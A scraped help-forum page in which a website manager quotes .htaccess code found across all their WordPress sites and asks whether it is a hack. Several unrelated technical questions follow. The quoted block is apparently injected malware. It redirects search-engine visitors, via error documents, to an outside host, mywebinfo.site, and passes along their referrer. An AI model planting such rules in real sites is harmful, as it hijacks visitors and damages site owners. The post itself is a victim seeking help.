Is this .htaccess file hacked? All of the sites I manage get random redirects

J

Joe Balazs

Guest
Joe Balazs Asks: Is this .htaccess file hacked? All of the sites I manage get random redirects
Is this htaccess file hacked? I'm referring to this code that's in all of the site's htaccess files:

Code: 
# END WordPress

<If "%{HTTP_REFERER} =~ m#/(.google.)|(.bing.)/#"> ErrorDocument 404 http://mywebinfo.site/jquery.php?referrer404=%{escape:%{HTTP_REFERER}} ErrorDocument 500 http://mywebinfo.site/jquery.php?referrer500=%{escape:%{HTTP_REFERER}}

I have installed Wordfence on all the sites that I manage for my company, and am constantly scanning and picking malicious stuff, but it never says anything about the .htaccess files...and they all have this code in them after #END Wordpress and before the code that Wordfence injects in there...

Here's a link to one of the sites, which today is redirecting...but it seems like the redirects are running in some kind of cascading effect, as in we have a bunch of sites under our hosting account, and one day site A redirecrts, and the next day site B redirects...anyways, today this site is redirecting:

[ODOT Apparel]

This site, along with every other site we have, has that code in it's htaccess file, and I'm wondering if that's part of the problem. FYI, I'm sort of self-taught out of necessity when it comes to this stuff, so be kind lol.

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...
 
You must log in or register to reply here.

Recent Threads

Why is it okay for my .bashrc or .zshrc to be writable by my normal user?

Zach Huxford Asks: Why is it okay for my .bashrc or .zshrc to be writable by my normal user?
My user ~/.zshrc file has the following default privileges

Code: 
-rw-r--r--

My understanding of user permissions is that any process spawned by my user will then have read/write permissions to this file.

In malicious hands this could probably be used to edit aliases or append a directory of the attackers choosing to the beginning of the $PATH. I'm concerned that a malicious program that I install on the user level could then trick me into somehow giving up my sudo password through this method.

Obviously I do trust most of the programs that I install to not be malicious, however, I do use npm as a package manager for my own projects which is commonly accepted to be a vector for malware due to the sheer number of dependencies each module and it's dependencies can have.

I know that running sudo npm install -g is really bad practice but is using npm as a user which has write access to your main shell configuration file almost as bad just with a few extra steps in between, or am I lacking an understanding of how user permissions/shell configuration/npm works?

If this is insecure, then have I somehow missed security good practice for handling node js projects?

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

SFTP user login details real-time filtering

  • Amal P Ramesh
  • Main forum
  • Replies: 0
Amal P Ramesh Asks: SFTP user login details real-time filtering
I have enabled the SFTP login log into the default logfile /var/log/syslog and tried to filter the login time of each user and insert it into the database.

But the filtering is not worked as I expected.

Sample log file:

Code: 
Jun 23 15:47:03 ip-172-16-0-62 systemd[24938]: Reached target Shutdown.
Jun 23 15:47:03 ip-172-16-0-62 systemd[24938]: Starting Exit the Session..c.
Jun 23 15:47:03 ip-172-16-0-62 systemd[24938]: Received SIGRTMIN+24 from PID 24980 (kill).
Jun 23 15:47:03 ip-172-16-0-62 systemd[1]: Stopped User Manager for UID 1051.
Jun 23 15:47:03 ip-172-16-0-62 systemd[1]: Removed slice User Slice of nidasu.
Jun 23 15:47:13 ip-172-16-0-62 systemd[1]: Created slice User Slice of ftpuser1.
Jun 23 15:47:13 ip-172-16-0-62 systemd[1]: Starting User Manager for UID 1069...
Jun 23 15:47:13 ip-172-16-0-62 systemd[1]: Started Session 11907571 of user ftpuser1.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Listening on REST API socket for snapd user session agent.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Reached target Paths.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Reached target Timers.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Reached target Sockets.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Reached target Basic System.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Reached target Default.
Jun 23 15:47:13 ip-172-16-0-62 systemd[24987]: Startup finished in 15ms.

Needs to filter user login messages, like:

Code: 
Jun 23 15:47:13 ip-172-16-0-62 systemd[1]: Started Session 11907571 of user ftpuser1.

I need to grep it out by matching the string "Started Session 11907571 of user ftpuser1"

The session number 11907571 is a random number and usernames also differ so grepping can ignore the numbers and usernames, only need to check the string like: **"Started Session *** of user ***"

And need to parse the line and grep the date + time, and username then insert it into the MySQL database.

If there is any option to create a daemon process to run and insert the details into DB, it will help me to do the task.

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

get nat port forwarding IP address

gyandoo Asks: get nat port forwarding IP address
I am using an android phone that is connected to an openwrt router via usb tether

The android phone has a dynamic wan gateway on each reboot

To make things easy for me to connect to the webui of some of the apps on the android phone via the openwrt router, I created a port forwarding rule in openwrt and entered the wan ip of the android phone manually. port forwarding rule

On each reboot of the android phone, i will have to check the routes in openwrt, get the new wan ip and update the port forwarding rule, which is fine

to make things easier on my linux machine, id like to be able to use CLI to get that wan ip that i set in port forwarding i.e 192.168.1.1:32399

not that it matters, but curlftpfs ftp mounting isn't playing well with nat, all other android app webui's are working fine with the port redirect, curlftpfs requires the wan ip, it finds the wan ip in debug but skips it

thanks

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

Using docker does not give error with sudo but using ctr does on starting a container

Mithilesh Asks: Using docker does not give error with sudo but using ctr does on starting a container
I am starting a container using the docker run command, it works fine. However when I try to start the same container using ctr command (irrespective of whatever snapshotter I use) I get this error:

Code: 
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?

The error is coming from one of the lines in the dockerfile which is prepended by sudo . Please note that I tried removing sudo but then it gives permission denied error. As per my understanding docker engine uses ctr under the hood. Then why does not working for ctr? How shall I proceed to de

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

What are some of the latest Nike soccer shoes that have gained popularity among players and enthusiasts in recent years?

Bryan Fury Asks: What are some of the latest Nike soccer shoes that have gained popularity among players and enthusiasts in recent years?
In recent years, the Nike Mercurial Vapor XI NJR soccer shoes have gained significant popularity among players and enthusiasts. These cleats, also known as the “Neymar edition”, are renowned for their explosive speed and agility on the field. With a lightweight and streamlined design, the Nike Mercurial Vapor allows players to move swiftly and effortlessly. Equipped with innovative technology and high-quality materials, these cleats offer exceptional traction and responsiveness, making them a top choice for players seeking optimal performance. The sleek aesthetic of the Nike Mercurial Vapor XI NJR, inspired by Neymar Jr., one of the world's top soccer players, has contributed to their widespread acclaim among soccer enthusiasts.

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

Can't change TCP/IPv4 settings on windows 10

AbdelKh Asks: Can't change TCP/IPv4 settings on windows 10
As I am trying to change my wireless IPv4 or DNS IP address, everything goes well until I click OK.

The adapter window pops up this error: "An unexpected condition occurred. Not all of your requested changes in settings could be made"

Picture of the error message


Even when I restored Windows, disabled and re enabled the adapter, the problem was not solved.

Any help would be appreciated.

Edit: I fixed that by resetting Windows 10. No other solution worked for me.

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

Customer service access 2007 template

tintincutes Asks: Customer service access 2007 template
anybody is familiar with this? can you please help me understand where can I find the other tables, Cases_1 and Employees_1? If I click on the relationship I can see these tables but I can't see that on the Main Page? are they some kind of being hidden?

SolveForum.com may not be responsible for the answers or solutions given to any question asked by the users. All Answers or responses are user generated answers and we do not have proof of its validity or correctness. Please vote for the answer that helped you in order to help others find out which is the most helpful answer. Questions labeled as solved may be solved or may not be solved depending on the type of question and the date posted for some posts may be scheduled to be deleted periodically. Do not hesitate to share your thoughts here to help others.
Click to expand...

Latest posts

Newest Members

Top